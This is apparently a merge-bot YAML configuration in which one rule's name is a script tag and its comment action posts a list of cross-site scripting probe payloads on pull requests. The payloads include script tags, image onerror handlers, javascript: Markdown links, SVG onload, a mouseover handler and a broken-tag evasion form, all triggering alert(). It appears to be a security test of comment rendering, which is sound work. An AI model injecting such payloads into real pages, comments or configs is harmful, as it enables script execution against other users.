queue_rules:
  - name: default
    queue_conditions:
      - "base=main"
    merge_conditions: []
    merge_method: merge

pull_request_rules:
  - name: <script>alert('XSS-HTML')</script>
    conditions:
      - "base=main"
    actions:
      comment:
        message: |
          🚀 **XSS Testing Bot Activated** 🚀

          **HTML Injection:**
          <script>alert('XSS-HTML')</script>

          **Image Injection:**
          <img src=x onerror=alert('XSS-IMG')>

          **Markdown Image Injection:**
          ![xss](javascript:alert('XSS-Markdown-IMG'))

          **Obfuscated JavaScript:**
          <img src=x oNerror=alert('XSS-Obfuscated')>

          **Markdown Link Injection:**
          [XSS-TEST](javascript:alert('XSS-Markdown-Link'))

          **SVG Injection:**
          <svg/onload=alert('XSS-SVG')>

          **Attribute Injection (mouseover):**
          <a href="#" onmouseover="alert('XSS-OnMouseOver')">hover me</a>

          **Broken HTML Injection:**
          <<script>script>alert('XSS-Broken')</</script>script>
  - name: automatic queue for testing
    conditions: []
    actions:
      queue:
